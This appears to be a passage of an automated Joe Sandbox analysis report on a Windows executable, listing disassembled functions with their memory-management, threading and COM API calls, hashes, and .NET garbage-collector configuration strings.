CreateThread.KERNELBASE ref: 00007FF7D785C259
FindCloseChangeNotification.KERNELBASE ref: 00007FF7D785C26C

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: ChangeCloseCreateFindNotificationThread
String ID:
API String ID: 4060959955-0
Opcode ID: 94fce3c1a3e2342f5ee234b364270516c8f38728fa6da28f93b2077b2e757732
Instruction ID: d3115d04c93ff90323714a55841b3cc1a42f62058a4464a42edeab850443c2bd
Opcode Fuzzy Hash: 94fce3c1a3e2342f5ee234b364270516c8f38728fa6da28f93b2077b2e757732
Instruction Fuzzy Hash: 03D01266F0974282EF18FF7168111296BD17B98B84FC54039DD4D83330FE3C92568D10

Function 00007FF7D7878260 Relevance: 2.6, APIs: 2, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7D7892CB0: EnterCriticalSection.KERNEL32(?,?,?,00007FF7D7878299,?,?,?,?,?,?,?,?,?,?,?,00007FF7D7889ADB), ref: 00007FF7D7892CF4
Part of subcall function 00007FF7D7892CB0: LeaveCriticalSection.KERNEL32(?,?,?,00007FF7D7878299,?,?,?,?,?,?,?,?,?,?,?,00007FF7D7889ADB), ref: 00007FF7D7892D1E

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7D7889ADB), ref: 00007FF7D7878373
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7D7889ADB), ref: 00007FF7D7878394

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 7bef5afea3e0106a11954e4f22f1a159313447f856eab900a79d99d6bdfc1ef7
Instruction ID: e6ef10c2f3e1cf8071b5f36d0e64bbab37c15198f6d5e2e5bbf6e1a6fb30c2b2
Opcode Fuzzy Hash: 7bef5afea3e0106a11954e4f22f1a159313447f856eab900a79d99d6bdfc1ef7
Instruction Fuzzy Hash: 6741E661B18A5241EB18AB2DD85063CA794AF80BF5FD04337D9AD8B6D5DF2CE093C350

Function 00007FF7D7861100 Relevance: 2.6, APIs: 2, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00007FF7D7861174

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3c596e4bd7640e440b5b375c9bd25b8a4958a28eaac5f0113fb6fb274d2af953
Instruction ID: e12c9ec0241921cfc54afadd49f1af960eba96703d6ed828552b53d221c4ed61
Opcode Fuzzy Hash: 3c596e4bd7640e440b5b375c9bd25b8a4958a28eaac5f0113fb6fb274d2af953
Instruction Fuzzy Hash: 8831EF32A05B5282EA14EB16944016EABA4FB48FD1FC48136DF5C57B95EF38E4B3C360

Function 00007FF7D7892CB0 Relevance: 2.5, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00007FF7D7878299,?,?,?,?,?,?,?,?,?,?,?,00007FF7D7889ADB), ref: 00007FF7D7892CF4
LeaveCriticalSection.KERNEL32(?,?,?,00007FF7D7878299,?,?,?,?,?,?,?,?,?,?,?,00007FF7D7889ADB), ref: 00007FF7D7892D1E

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 3deeaea78802c5756930366cc94c832c51a795e22223c732d513482cf9e31b0c
Instruction ID: e38ad1d9e4c9d088bdb6455eb8e2c9ba47a60bcaea82d51099a315e1753c8dcc
Opcode Fuzzy Hash: 3deeaea78802c5756930366cc94c832c51a795e22223c732d513482cf9e31b0c
Instruction Fuzzy Hash: 47018422D0C69260F668B718F8856BCEBD4AF80794FD54133D59D469A6CF2DF4A7C320

Function 00007FF7D7861ED0 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007FF7D7861EE6
VirtualFree.KERNELBASE ref: 00007FF7D7861EFC

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: f858efc1134c48ad502d6be1195047a2a7a8b8895866ec2d2026d2a0ac795c5c
Instruction ID: 3b1c2009392128805b7f7bdfc71bc3dd2eafbab0620a3c13d98549dc94c208b2
Opcode Fuzzy Hash: f858efc1134c48ad502d6be1195047a2a7a8b8895866ec2d2026d2a0ac795c5c
Instruction Fuzzy Hash: F9E0C234F1660282EF1CAB12A855A2C5B917F99F41FC4C03AC80D42360EE2DA25B8F20

Function 00007FF7D78F6950 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF7D78F688F,?,?,00000030), ref: 00007FF7D78F69A2

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 419552e2dce98666eb03347efec70e658c2c568df8243ba8d694c574aa042414
Instruction ID: 9865c6a8d41d65c50355ef43a34b94982149ea6b7c6a138a26783ae854dc7e8c
Opcode Fuzzy Hash: 419552e2dce98666eb03347efec70e658c2c568df8243ba8d694c574aa042414
Instruction Fuzzy Hash: EB21A722F0860354FB10FA629C525FEDA645F64754FD44137DE4E46687DE3CE4678320

Function 00007FF7D7855110 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D785BEA0: GetCurrentThreadId.KERNEL32 ref: 00007FF7D785BEA4

Part of subcall function 00007FF7D785D250: VirtualQuery.KERNEL32 ref: 00007FF7D785D282

RaiseFailFastException.KERNEL32 ref: 00007FF7D7855196

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
String ID:
API String ID: 2131581837-0
Opcode ID: 3f60d08420bb5740684442e6b47ce9b43c0939d8906b761c1e319142f3b68845
Instruction ID: f11243b70b486d103ed6960d39a10ef9d95002e3f0f4f7c0155c0e47e8577505
Opcode Fuzzy Hash: 3f60d08420bb5740684442e6b47ce9b43c0939d8906b761c1e319142f3b68845
Instruction Fuzzy Hash: D9114C3290878182D624AF25B4411AEBB61F7457B0FD4433AE6BE077D6DF38E0578700

Function 00007FF7D7855EA0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 00007FF7D7855EF1

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: Event
String ID:
API String ID: 4201588131-0
Opcode ID: 1e2a9b53d969d5948f3047037f8e2bd0bb509a0fdab695aab94487370a32bdeb
Instruction ID: 76ded50b60e047c393201ec2178f549bdb2a161e60d17eb488ad0f338a433cd4
Opcode Fuzzy Hash: 1e2a9b53d969d5948f3047037f8e2bd0bb509a0fdab695aab94487370a32bdeb
Instruction Fuzzy Hash: 56F0A711F2CA8241FA047725B99267FAB529F857E0FD85132E91E07793CD3CD4A38760

Function 00007FF7D7861FA0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE ref: 00007FF7D7861FAA

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: e5cf293bc4a834a99d51c613cb1832b35ae8e6fc01d64492a80f8c5fa2f271cc
Instruction ID: 960e368aaf7d8b2993486b8600034842a768eb87dc16171b32e5deb52c7286b9
Opcode Fuzzy Hash: e5cf293bc4a834a99d51c613cb1832b35ae8e6fc01d64492a80f8c5fa2f271cc
Instruction Fuzzy Hash: F3B01200F16102C2E7483B237C8270C06542B45F42FC50024DA0CA02A0CD1C81E61F10

Non-executed Functions

Function 00007FF7D7862230 Relevance: 118.0, Strings: 94, Instructions: 546COMMON

Download Yara Rule

Strings

BGCFLEnableSmooth, xrefs: 00007FF7D786298F
HeapVerifyLevel, xrefs: 00007FF7D78623F2
System.GC.Server, xrefs: 00007FF7D786224B
GCHeapAffinitizeRanges, xrefs: 00007FF7D78625AE, 00007FF7D78625CF
GCSpinCountUnit, xrefs: 00007FF7D7862B7E
LogFile, xrefs: 00007FF7D786275B
SegmentSize, xrefs: 00007FF7D78624EA
System.GC.HeapHardLimitSOH, xrefs: 00007FF7D7862A07
BGCFLSweepGoalLOH, xrefs: 00007FF7D7862845
BGCFLGradualD, xrefs: 00007FF7D78628F9
LogFileSize, xrefs: 00007FF7D7862544
GCHeapHardLimitLOHPercent, xrefs: 00007FF7D7862AA1
ServerGC, xrefs: 00007FF7D786225A
BGCMLkp, xrefs: 00007FF7D7862922
System.GC.HeapHardLimitPercent, xrefs: 00007FF7D78626AB
GCHeapHardLimitSOH, xrefs: 00007FF7D7862A16
BGCFLkd, xrefs: 00007FF7D786289F
LOHCompactionMode, xrefs: 00007FF7D7862410
GCEnableSpecialRegions, xrefs: 00007FF7D7862727
BGCFLkp, xrefs: 00007FF7D7862863
NoAffinitize, xrefs: 00007FF7D7862332
GCRegionSize, xrefs: 00007FF7D7862709
ConservativeGC, xrefs: 00007FF7D7862298
System.GC.Name, xrefs: 00007FF7D7862B34, 00007FF7D7862B4C
BGCSpinCount, xrefs: 00007FF7D786244C
GCRegionRange, xrefs: 00007FF7D78626EB
GCHeapHardLimitPOHPercent, xrefs: 00007FF7D7862AC0
BGCFLSweepGoal, xrefs: 00007FF7D7862827
System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF7D7862AB1
GCHighMemPercent, xrefs: 00007FF7D78625FE
GCCpuGroup, xrefs: 00007FF7D78623BA
ConfigLogEnabled, xrefs: 00007FF7D7862366
BGCFLEnableFF, xrefs: 00007FF7D78629CB, 00007FF7D7862B13
ConcurrentGC, xrefs: 00007FF7D7862285
CompactRatio, xrefs: 00007FF7D7862562
System.GC.HeapAffinitizeRanges, xrefs: 00007FF7D78625A2, 00007FF7D78625C3
GCGen1MaxBudget, xrefs: 00007FF7D786264D
BGCFLff, xrefs: 00007FF7D78628BD
LatencyMode, xrefs: 00007FF7D7862508
GCLowSkipRatio, xrefs: 00007FF7D786266B
LogEnabled, xrefs: 00007FF7D7862345
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF7D7862A97
System.GC.CpuGroup, xrefs: 00007FF7D78623A8
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF7D7862A6D
BGCFLki, xrefs: 00007FF7D7862881
System.GC.RetainVM, xrefs: 00007FF7D78622DA
Gen0Size, xrefs: 00007FF7D78624CC
BGCSpin, xrefs: 00007FF7D786246A
MaxHeapCount, xrefs: 00007FF7D78624B9
BGCFLEnableKi, xrefs: 00007FF7D7862953
LOHThreshold, xrefs: 00007FF7D786242E
GCLargePages, xrefs: 00007FF7D78623E2
GCHeapHardLimitPercent, xrefs: 00007FF7D78626BA
System.GC.HeapHardLimitPOH, xrefs: 00007FF7D7862A4B
GCName, xrefs: 00007FF7D7862B3B, 00007FF7D7862B5E
GCProvModeStress, xrefs: 00007FF7D7862611
System.GC.Concurrent, xrefs: 00007FF7D7862273
BGCMemGoalSlack, xrefs: 00007FF7D7862809
GCConserveMem, xrefs: 00007FF7D7862B00
GCConfigLogFile, xrefs: 00007FF7D786278E
GCHeapHardLimitSOHPercent, xrefs: 00007FF7D7862A7C
GCLogFile, xrefs: 00007FF7D786274A
GCDynamicAdaptationMode, xrefs: 00007FF7D7862BAB
BGCMLki, xrefs: 00007FF7D7862935
System.GC.HeapHardLimit, xrefs: 00007FF7D7862689
BGCG2RatioStep, xrefs: 00007FF7D78629E9
GCHeapHardLimitPOH, xrefs: 00007FF7D7862A5A
BGCFLEnableTBH, xrefs: 00007FF7D78629AD
GCHeapAffinitizeMask, xrefs: 00007FF7D786258F
GCGen0MaxBudget, xrefs: 00007FF7D786262F
BGCFLSmoothFactor, xrefs: 00007FF7D78628DB
HeapCount, xrefs: 00007FF7D7862497
RetainVM, xrefs: 00007FF7D78622EC
BGCFLEnableKd, xrefs: 00007FF7D7862971
System.GC.ConserveMemory, xrefs: 00007FF7D7862AF1
GCNumaAware, xrefs: 00007FF7D7862387
System.GC.HeapCount, xrefs: 00007FF7D7862488
BreakOnOOM, xrefs: 00007FF7D78622FF
GCHeapHardLimitLOH, xrefs: 00007FF7D7862A38
System.GC.LargePages, xrefs: 00007FF7D78623D8
GCTotalPhysicalMemory, xrefs: 00007FF7D78626CD
BGCMemGoal, xrefs: 00007FF7D78627EB
System.GC.HeapAffinitizeMask, xrefs: 00007FF7D7862580
GCEnabledInstructionSets, xrefs: 00007FF7D7862AD3
LatencyLevel, xrefs: 00007FF7D7862526
System.GC.HeapHardLimitLOH, xrefs: 00007FF7D7862A29
System.GC.MaxHeapCount, xrefs: 00007FF7D78624AA
ConfigLogFile, xrefs: 00007FF7D786279F
System.GC.HighMemoryPercent, xrefs: 00007FF7D78625EF
GCHeapHardLimit, xrefs: 00007FF7D7862698
System.GC.DynamicAdaptationMode, xrefs: 00007FF7D7862B9C
BGCFLTuningEnabled, xrefs: 00007FF7D78627CD
System.GC.NoAffinitize, xrefs: 00007FF7D7862320
ForceCompact, xrefs: 00007FF7D78622B9

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126737374.00007FF7D7972000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126770181.00007FF7D79C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126816252.00007FF7D7A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d7850000_101 2043 5770 pdf.jbxd

Similarity

API ID:
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
API String ID: 0-799405152
Opcode ID: f9cb6473f0426aeca1aac28d737a422ab705a9c61f3a95987954254e9b7fdaa7
Instruction ID: 6d671016e10cb8fc50144699b9d57fcf4c59dad627eebecb69382661ecb3b8b6
Opcode Fuzzy Hash: f9cb6473f0426aeca1aac28d737a422ab705a9c61f3a95987954254e9b7fdaa7
Instruction Fuzzy Hash: 5C425C61A1CA5682EB28AB59F950EADA764FF997C8FC15133D98C07E24DF3DD2038710

Function 00007FF7D7862F80 Relevance: 109.2, Strings: 87, Instructions: 472COMMON

Download Yara Rule

Strings

BGCFLEnableSmooth, xrefs: 00007FF7D7863808
System.GC.Server, xrefs: 00007FF7D7862F8B
GCSpinCountUnit, xrefs: 00007FF7D7863A40
System.GC.HeapHardLimitSOH, xrefs: 00007FF7D78638AC
BGCFLSweepGoalLOH, xrefs: 00007FF7D7863645
BGCFLGradualD, xrefs: 00007FF7D786373B
GCHeapHardLimitLOHPercent, xrefs: 00007FF7D786396B
BGCMLkp, xrefs: 00007FF7D7863764
System.GC.HeapHardLimitPercent, xrefs: 00007FF7D78634CF
GCHeapHardLimitSOH, xrefs: 00007FF7D78638B3
BGCFLkd, xrefs: 00007FF7D78636C0
GCSegmentSize, xrefs: 00007FF7D78632D4
GCEnableSpecialRegions, xrefs: 00007FF7D7863578
GCCompactRatio, xrefs: 00007FF7D7863378
BGCFLkp, xrefs: 00007FF7D786366E
GCRegionSize, xrefs: 00007FF7D7863558
GCLogFileSize, xrefs: 00007FF7D7863358
BGCSpinCount, xrefs: 00007FF7D78631FD
GCRegionRange, xrefs: 00007FF7D7863526
GCHeapHardLimitPOHPercent, xrefs: 00007FF7D7863999
BGCFLSweepGoal, xrefs: 00007FF7D786361C
System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF7D7863992
GCHighMemPercent, xrefs: 00007FF7D78633D6
GCCpuGroup, xrefs: 00007FF7D7863130
BGCFLEnableFF, xrefs: 00007FF7D786385A
gcServer, xrefs: 00007FF7D7862F92
GCGen1MaxBudget, xrefs: 00007FF7D786344F
BGCFLff, xrefs: 00007FF7D78636E9
GCLatencyLevel, xrefs: 00007FF7D7863326
GCConfigLogEnabled, xrefs: 00007FF7D78630D9
GCBreakOnOOM, xrefs: 00007FF7D786305C
GCLowSkipRatio, xrefs: 00007FF7D7863478
GCNoAffinitize, xrefs: 00007FF7D786308B
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF7D7863964
System.GC.CpuGroup, xrefs: 00007FF7D7863129
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF7D7863936
BGCFLki, xrefs: 00007FF7D7863697
System.GC.RetainVM, xrefs: 00007FF7D786302F
BGCSpin, xrefs: 00007FF7D7863226
GCWriteBarrier, xrefs: 00007FF7D7863A17
BGCFLEnableKi, xrefs: 00007FF7D78637B6
GCLargePages, xrefs: 00007FF7D786315D
GCHeapHardLimitPercent, xrefs: 00007FF7D78634D6
GCgen0size, xrefs: 00007FF7D78632AB
System.GC.HeapHardLimitPOH, xrefs: 00007FF7D786390F
GCProvModeStress, xrefs: 00007FF7D78633FD
System.GC.Concurrent, xrefs: 00007FF7D7862FB2
BGCMemGoalSlack, xrefs: 00007FF7D78635F3
gcForceCompact, xrefs: 00007FF7D7863007
GCHeapHardLimitSOHPercent, xrefs: 00007FF7D786393D
GCLOHCompact, xrefs: 00007FF7D78631AB
GCDynamicAdaptationMode, xrefs: 00007FF7D7863A70
BGCMLki, xrefs: 00007FF7D786378D
GCMaxHeapCount, xrefs: 00007FF7D7863284
System.GC.HeapHardLimit, xrefs: 00007FF7D78634A1
BGCG2RatioStep, xrefs: 00007FF7D7863883
GCHeapHardLimitPOH, xrefs: 00007FF7D7863916
BGCFLEnableTBH, xrefs: 00007FF7D7863831
GCHeapAffinitizeMask, xrefs: 00007FF7D78633A8
GCGen0MaxBudget, xrefs: 00007FF7D7863426
GCLogEnabled, xrefs: 00007FF7D78630B1
GCConserveMemory, xrefs: 00007FF7D78639F0
BGCFLSmoothFactor, xrefs: 00007FF7D786371B
BGCFLEnableKd, xrefs: 00007FF7D78637DF
System.GC.ConserveMemory, xrefs: 00007FF7D78639E9
GCNumaAware, xrefs: 00007FF7D7863101
HeapVerify, xrefs: 00007FF7D7863183
System.GC.HeapCount, xrefs: 00007FF7D786324F
GCRetainVM, xrefs: 00007FF7D7863036
GCHeapHardLimitLOH, xrefs: 00007FF7D78638E1
System.GC.LargePages, xrefs: 00007FF7D7863156
GCTotalPhysicalMemory, xrefs: 00007FF7D78634FD
GCLOHThreshold, xrefs: 00007FF7D78631D4
BGCMemGoal, xrefs: 00007FF7D78635CA
System.GC.HeapAffinitizeMask, xrefs: 00007FF7D78633A1
GCEnabledInstructionSets, xrefs: 00007FF7D78639C0
GCLatencyMode, xrefs: 00007FF7D78632FD
System.GC.HeapHardLimitLOH, xrefs: 00007FF7D78638DA
System.GC.MaxHeapCount, xrefs: 00007FF7D786327D
System.GC.HighMemoryPercent, xrefs: 00007FF7D78633CF
GCHeapHardLimit, xrefs: 00007FF7D78634A8
gcConcurrent, xrefs: 00007FF7D7862FB9
System.GC.DynamicAdaptationMode, xrefs: 00007FF7D7863A69
BGCFLTuningEnabled, xrefs: 00007FF7D78635A1
System.GC.NoAffinitize, xrefs: 00007FF7D7863084
gcConservative, xrefs: 00007FF7D7862FDF
GCHeapCount, xrefs: 00007FF7D7863256

Memory Dump Source

Source File: 00000000.00000002.2126661606.00007FF7D7851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D7850000, based on PE: true

Associated: 00000000.00000002.2126648588.00007FF7D7850000.00000002.00000001.01000000.00000003.sdmpDownload File
